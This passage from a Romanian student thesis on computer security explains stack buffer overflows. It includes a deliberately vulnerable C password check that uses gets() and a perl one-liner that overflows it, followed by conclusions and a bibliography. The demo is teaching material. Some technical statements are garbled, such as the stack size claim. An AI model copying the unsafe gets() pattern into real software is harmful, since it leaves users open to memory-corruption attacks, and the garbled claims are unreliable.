Stack este un block de memorie ce este folosit de funcții. Pentru arhitectură Intel x86, cantitatea maximă de memorie este între 4 bytes și 32 de bits. Pointerul ESP este folosit pentru a arăta datele din top-ul stack. Stack-ul este folosit de funcții. El ține argumentele funcțiilor și alocă dinamic spațiul pentru variabilele locale. Stack Buffer Overflow sau suprascrierea memoriei apare atunci când o funcție copiază o cantitate de date mai mare într-un buffer fără a face verificări sau validări.

Figura 3. 4– Stack Buffer Overflow

Pentru a demonstra acest tip de vulnerabilitate, se dă următorul program care este scris în limbajul de programare C++. Funcțiile vulnerabile la acest tip de atac sunt urmatoarele: gets(), scanf(), sprintf(), strcpy().

#include <string.h>

#include <stdio.h>

#define gasestePass "parola"

int main()

{

char OK = 0;

char stackbuff[30];

printf("Introdu parola: \n");

gets(stackbuff);

if(strcmp(stackbuff, gasestePass) == 0)

OK = 1;

if(OK == 1)

printf("Felicitari. Ai gasit parola!\n\t");

}

Pentru a rula acest program, vom executa următoarele comenzi în terminal:

gcc -o exploit exploit.c

perl -e 'print "CCCC" . "\x64\x41\x42\x31" x 100' | ./exploit

Figura 3. 5– Stack Buffer Overflow – segmentation fault.

Figura 3. 6– Rezultat Stack Buffer Overflow

CONCLUZII ȘI RECOMANDĂRI

Vulnerabilitățile informatice apar din cauza erorilor de programare și a neverificării atente a programului. De aceea, multe companii pierd date esențiale din cauză că nu aloca fonduri suficiente pentru programe ce fac verificări periodice (Quality Testing) pe software.

Dacă un cercetător în acest domeniu găsește o vulnerabilitate de acest tip, buffer overflow, atunci, poate să încerce să dezvolte o vulnerabilitate pentru programul respectiv. Este foarte important ca softurile respective să fie verificate și din punct de vedere al securității înainte să fie utilizate la scară largă.

Din buffer overflow se poate ajunge la remote code execution sau remote buffer overflow și acest lucru nu este de dorit de nimeni dintr-o companie ce dezvoltă software, deoarece, acest lucru permite unui atacator să intre într-un sistem informatic și nimic nu-l mai poate împiedica în a face rău.

Este recomandat ca într-o companie să existe cel puțin 4 sisteme sau 4 layere diferite de securitate și anume (Firewall, Intrusion Detection System , Antivirus Engine și Spam Filter).

BIBLIOGRAFIE

[1]. https://en.wikipedia.org/wiki/Web_application_security.

[2]. Ciprian Bogdan Chirilă, Sorin Cristian Argaliță, Mircea Baba. Îndrumător de laborator, Limbaje formale si translatoare, Securitatea Informației, Medii de programare vizule, Editura Eurostampa (2015).

[3]. Hanqing Wu, Liz Zhao. Web Security: A WhiteHat Perspective. Editura Auerbach Publications. (2015).

[4]. Justin Seitz, Black Hat Python: Programming for Hackers and Pentesters, Editura No Starch Press, 2014.

[5]. Michael Sikorski, Andrew Honig, Practical Malware Analysis: The Hands On Guide to Dissecting, Malicious Software, Editura No Starch Press, 2012.

[6]. Eldad Eilam, Reversing: Secrets of Reverse Engineering, Editura Wiley, 2005.

[7]. Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions, Editura McGraw-Hill Media, 2005.

[8]. Jon Erickson, Hacking: The art of exploatation, Editura No Starch Press, 2008.

[9]. Lawrence Fennelly, Effective Physical Security, Fourth Edition, Editura Butterworth-Heinemann, 2012.

[10]. Fred Kaplan, Dark Territory: The Secret History of Cyber War, Editura Simon & Schuster, 2017.

[11]. https://pwnthecode.com/courses/

[12]. https://www.owasp.org/index.php/Category:Attack

[13]. Titus Slavici, Nicoleta Ularu, Andreea Bozeșan, Cristian Coșariu, Liviu Herman, Mihai Adrian, Mircea Baba. Ingineria Programării și Limbaje de Programare. Editura Eurostampa, 2015.

[14] David Gordon Rose. Triad. Editura RoseTintedSpecs Imprint, 2009

[15] http://www.criminalitatea-informatica.ro

DECLARAȚIE DE AUTENTICITATE

A

LUCRĂRII DE FINALIZARE A STUDIILOR

Titlul lucrării: Securitatea informatică în societatea contemporană. Vulnerabilități, Bug Bounty, Hacking

Autorul lucrării:……………………………………………………………………….

Lucrarea de finalizare a studiilor este elaborată în vederea susținerii examenului de finalizare a studiilor organizat de către Facultatea de Inginerie Electrică și Tehnologia Informației din cadrul Universității din Oradea, sesiunea IULIE 2018 a anului universitar 2017/2018.

Prin prezenta, subsemnatul (nume, prenume, CNP)

________________________________________________________________,

declar pe proprie răspundere că această lucrare a fost scrisă de către mine, fără nici un ajutor neautorizat și că nici o parte a lucrării nu conține aplicații sau studii de caz publicate de alți autori.

Declar, de asemenea, că în lucrare nu există idei, tabele, grafice, hărți sau alte surse folosite fără respectarea legii române și a convențiilor internaționale privind drepturile de autor.

Oradea,

Data Semnătura,

Similar Posts